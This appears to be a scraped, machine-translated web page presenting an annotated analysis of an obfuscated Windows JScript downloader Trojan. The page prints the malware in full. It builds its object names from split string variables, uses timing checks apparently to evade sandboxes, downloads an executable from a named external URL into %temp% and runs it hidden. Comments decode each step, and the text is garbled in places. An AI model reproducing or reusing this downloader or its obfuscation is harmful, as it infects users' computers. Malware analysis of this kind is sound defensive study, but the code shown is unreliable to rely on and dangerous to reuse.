Windows native script script malicious Code Analysis (annotated)

Source: Internet
Author: User

After sample analysis and crawl, this malicious program is a download Trojan horse.


Can not understand Baidu encyclopedia.

Http://baike.baidu.com/link?url=0dNqFM8QIjEQhD71ofElH0wHGktIQ3sMxer47B4z_54LSHixZYLcNWDgisJAeMRN5yJKjMu3znZc_sMh43cuwK

var ukczjmztw = "F"; var Vljbzijbrdixir = "SD"; var mzhidfbvgtzwl = "Uhi"; var xrxesgiwq = "Ya"; var stgtoceaugs = "F"; var Mcc Q = "GSD"; var yvfrnfkc = "a7o"; var Zokyxgifsuosdin = "d8f"; var rysgoqrkj = "HgS"; var fajepxv = "7"; var LzK = "U"; var wnkgg Byjhbgayk = "DFA"; var rqjm = "S"; var tcbpcsvm = "O"; var Glyiongtmo = "a"; var Cmleb = "Fkj"; var gumapaymgfr = "; l"; var AWOs Zjal = "D"; var rrruwakbvmdht = "S"; var qcfk = "a"; asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf//---------------------------------var wxgm = "F"; var WME = "SD"; var wyl = "HI"; var dgxr = "Yau"; var ofbjpavgdudsr = "SDF"; var akaujbxv = "G"; var Ywynebktcar = "a7o"; var umknxpoxkvv = "8f"; var jruthqojc  Xz = "D"; var vmrauxwtpkwlzbj = "HgS"; var hnakwb = "Au7"; var Kurwvoq = "F"; var oxjw = "D"; var Wsagyfatjpu = "AOS"; var UdT = "J"; var wgkyturmi = "K"; var fwsau = "; lf"; var ussmxvh = "D"; var Xruulsujwzczein = "as";//asd;lfkjaosdfau7hgsd8fa7ogsdfyau hisdf////---------------------------------var fvjysepitgsz = "F"; var mjlm = "SD"; var ohdtwuswyldnd = "Hi"; var Nfkohhanka = "Au"; var pajlp = "FY"; var xteqe = "D"; var Wolngrckpnji = "S"; var Ctd0 = "og"; var ngjpec = "A7"; va R JOHMRZHTBT = "F"; var rwrr = "D8"; var xhuyvlxntg = "GS"; var aofesd = "7h"; var iartkeg = "FAU"; var UICUSNVVRYPV = "OSD"; VA R SQXTHDCTAOOEFV = "Ja"; var ksxja = "K"; var azmzqadlr = "; lf"; var ofzc = "SD"; var UFs = "a";//ASD;LFKJAOSDFAU7HGSD8FA7OGSD fyauhisdf//-----------------------------------var WiM = "ose", var cdzfn = "L", var gtvoeyzrpmbky = "C";//close ();//----- ------------------------------var fkqycugsvdkek = "E"; var yldfonqslg = "Fil"; var kegv = "O"; var reweueffsfzcc = "VeT"; var Mcxydwkmdtez = "Sa";//savetofile ();//-----------------------------------var orfcagixftilpy = "on"; var AnB = "Iti"; var Oeudh = "POS";//position//-----------------------------------var bxwfuyaplk = "E"; var Zhbiendjhvi = "T"; var omwnrbis = "W Ri ";//write ()//-----------------------------------var ionaxhdnbsjshyl =" E "; var Svvps =" Typ ";//type//-------------- ---------------------var rxdykd = "Nvar ftsb = "Ope";//open//-----------------------------------var zzoo = "AM"; var tscsrkwikqy = "Tre"; var aifn = "B.s"; var Zbasfumik = "D"; var uwddgxvozcug = "O"; var musaovh = "D"; var Yzvowlzlpfausz = "A";//"ADODB.stream"//--------------------- --------------var pngkr = "ct", var iqpsquxjgp = "Je", var btjnufjw = "B"; var Liexl = "TeO"; var kzbj = "Rea"; var derqhnng = "C";//creatobject ("ADODB.stream") var litxpjamhxaguq = "4h4"; var wwzpwldmx = "6n"; var CuF0 = "k6j"; var ouhbkseqhf = "0"; VA R LQP = "hu/"; var rquoidonsf = "L.";  var njkvurbzu = "Ta", var csyccmfj = "Por", var xctxpkvh = "Egy"; var auuclqfydbnsn = "J"; var Ltxzk = "ev"; var Mpaarovfxvesej = ". N"; var nvjesnhzihjx = "www"; var jfdhyk = "://"; var cfpmrsibsmp = "P"; var RKP = "Htt";//http://www.nevjegyportal.hu/ok 6j6n4h4//-----------------------------------var ubtufbihbmz = "T"; var lwkk = "GE";//Get//--------------------------- --------var krpxn = "Pen"; var Hrntkpoubmya = "O";//open//-----------------------------------var ofdmpjoyw = "E"; VAR nlpqqu = "x", var CZPODXEYVQRFB = "7.e", var clfbaiuobq = "PO", var xmxyenhbtwhg = "M1"; var dqzegam = "Ko"; var ckougmrgjte = "SE"; var qasyj = "Ky";//kysekom1po7.exe//-----------------------------------var eqycevqquazi = "%/"; var TNGKCALXXEPJMF = "P"; var mnyqbv = "M"; var Frwlczopjcmjvoe = "E"; var kynfxzksc = "%T";//%temp%///------------------------- ----------var ajbjrfwcho = "GS"; var ryw = "in"; var lvlachwja = "Str"; var Ngjuy = "T"; var zxmail = "n"; var Xlaapawdhgaz = " E "; var lrtf =" M "; var EGXWFANKP =" Ron "; var ucopd =" Vi "; var xzqvowinmg =" n "; var nlgbspqidlaij =" NdE "; var gyo =" Xpa "; VA R gpyeolnn = "E";//expendenvironmentstrings//-----------------------------------var kpsxpufdrzihigv = "TP"; var VGOFGZZDOVH = "T"; var Wjoaasugz = "LH"; var Bphwmdys = "XM"; var awpqzn = "2."; var rnvidtrapbbfho = "XML"; var Ynxoqhqdiqydxve = "MS";//msxml2.xmlhttp//-----------------------------------var Zkemzwunlwomdud = "n", var ovqabstejwqkg = "Ru", var WKRVEZGFPAMCAC = "ell"; var aojg = "H"; var hdveufs = "S";var Pgitzpyn = "."; var Itvqhxcrebdudt = "T", var wxgwfqyhw = "Rip", var KDSFP = "C"; var nzv = "WS";//wscript.shell.run ()//--------------------- --------------var nffhujlofwsus = "ct"; var kvzbovovglseg = "Je"; var DXP = "B"; var zjrmzjunjfuys = "O"; var ecdmpfvaxg = "E" var stma = "at"; var knalphmovixz = "Cre";//createobject ()//-----------------------------------var ACTC = new Date (); var SZT0 = Actc.getmilliseconds (); Wscript.Sleep, var actc = new Date (), var brdtypaqicd = Actc.getmilliseconds (); Wscript.Sleep, var actc = new Date (), var VrU = Actc.getmilliseconds (); Wscript.Sleep, var actc = new Date (), var deywdl = Actc.getmilliseconds ();//var Ndnaj = Brdtypaqicd-szt0;//var NdNAj=n EW date (). Getmilliseconds ()-new date (). Getmilliseconds ()////10svar hrormjj = vru-brdtypaqicd;//10svar YSc0 = DE ywdl-vru;//10sWshShell = wscript[knalphmovixz + stma + ecdmpfvaxg + zjrmzjunjfuys + DXP + kvzbovovglseg + NFFHUJLOFW SUs] (nzv + KDSFP + wxgwfqyhw + Itvqhxcrebdudt + Pgitzpyn + hdveufs + AOJG + WKRVEZGFPAMCAC);//wshshell=wscript[createobject] (Wscript.shell.run); function Jmljvnfwjsplh (NLN) {wshshell[ ovqabstejwqkg + Zkemzwunlwomdud] (nln, 0, 0);} function Jmljvnfwjsplh (NLN)//{//Wshshell[run] (nln,0,0);//}function OCEOSFHPWS (n) {return Ynxoqhqdiqydxve + Rnvidtrapbbfho + awpqzn + bphwmdys + Wjoaasugz + VGOFGZZDOVH + KPSXPUFDRZIHIGV;} function OCEOSFHPWS (n)//{//return msxml2.xmlhttp;//}if ((Ndnaj! = HRORMJJ) | | (HRORMJJ! = YSc0))  {FOIKDMMZWKAUGLW = Wshshell[gpyeolnn + gyo + nlgbspqidlaij + xzqvowinmg + ucopd + EGXWFANKP + lrtf + XLaaPawDhGaz + ZXMail + Ngjuy + lvlachwja + ryw + Ajbjrfwcho] (KYNFXZKSC + Frwlczopjcmjvoe + MNYQBV + TNGKCALXXEPJMF + Eqycevqquazi) + QasyJ + C Kougmrgjte + Dqzegam + xmxyenhbtwhg + clfbaiuobq + CZPODXEYVQRFB + nlpqqu + ofdmpjoyw;//foikdmmzwkauglw=/%temp%/Path//Wsh Shell[expendedenvironmentstrings] (%temp%); EFASPQJ = OCEOSFHPWS (0),//var xmlhttp=new activeobject ("Microsoft.XMLHTTP"); WMRQFSRLJDPWT = WScript.CreateObject ( EFASPQJ);////xmlhttp ObjeCt//[hrntkpoubmya + krpxn]==open Wmrqfsrljdpwt[hrntkpoubmya + KRPXN] (Lwkk + ubtufbihbmz, RKP + CFpmRSiBsMp + JFDhyk  + NVJESNHZIHJX + Mpaarovfxvesej + ltxzk + auuclqfydbnsn + XCTXPKVH + csyccmfj + njkvurbzu + rquoidonsf + LQP + OUHbKSEqhF + CuF0 + wwzpwldmx + Litxpjamhxaguq, false);//WMRQFSRLJDPWT (get,http://www.nevjegyportal.hu/ok6j6n4h4,false);// Xmlhttp.open ("Get", "url", false); Wmrqfsrljdpwt.send (); while (Wmrqfsrljdpwt.readystate < 4) {Wscript.Sleep (1000) };//readystateelchu = wscript[knalphmovixz + stma + ecdmpfvaxg + zjrmzjunjfuys + DXP + kvzbovovglseg + NFFhujLOFwsUs] (YZVO Wlzlpfausz + MUSAOVH + uwddgxvozcug + zbasfumik + AIFN + tscsrkwikqy + zzoo);//var adostream=createobject ("ADODB.stream"); Elchu[hrntkpoubmya + KRPXN] ();//adostream.open (); Elchu[svvps + ionaxhdnbsjshyl] = 1;//adostream.type=1;elchu[ Omwnrbis + Zhbiendjhvi + bxwfuyaplk] (wmrqfsrljdpwt.responsebody);//adostream.write (wmrqfsrljdpwt.responsebody); Elchu[oeudh + AnB + orfcagixftilpy] = 0;//ADOSTREAM.POSITION=0;ELCHu[mcxydwkmdtez + reweueffsfzcc + KEGV + YLDFONQSLG + Fkqycugsvdkek] (FOIKDMMZWKAUGLW, 2);//adostream.savetofile (/%temp %/,2); Elchu[gtvoeyzrpmbky + CDZFN + WiM] ();//adostream.close ();//JMLJVNFWJSPLH ("/%temp%/");//wshshell[run] (NLN,0,0 ) Ndnaj = "ASD;LFKJAOSDFAU7HGSD8FA7OGSDFYAUHISDF" + new Date (). Getmilliseconds () + new Date (). Getmilliseconds (); /10SHRORMJJ = "ASD;LFKJAOSDFAU7HGSD8FA7OGSDFYAUHISDF" + VrU + brdtypaqicd;//new date (). Getmilliseconds ()-New date (). Getmilliseconds () = "ASD;LFKJAOSDFAU7HGSD8FA7OGSDFYAUHISDF" + new Date (). Getmilliseconds () + new Date (). Getmilliseconds ();//10sysc0 = "ASD;LFKJAOSDFAU7HGSD8FA7OGSDFYAUHISDF" + DEYWDL + vru;//10s}

Windows native script script malicious Code Analysis (annotated)

Related Article

Cloud Intelligence Leading the Digital Future

Alibaba Cloud ACtivate Online Conference, Nov. 20th & 21st, 2019 (UTC+08)

Register Now >

Starter Package

SSD Cloud server and data transfer for only $2.50 a month

Get Started >

Alibaba Cloud Free Trial

Learn and experience the power of Alibaba Cloud with a free trial worth $300-1200 USD

Learn more >

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.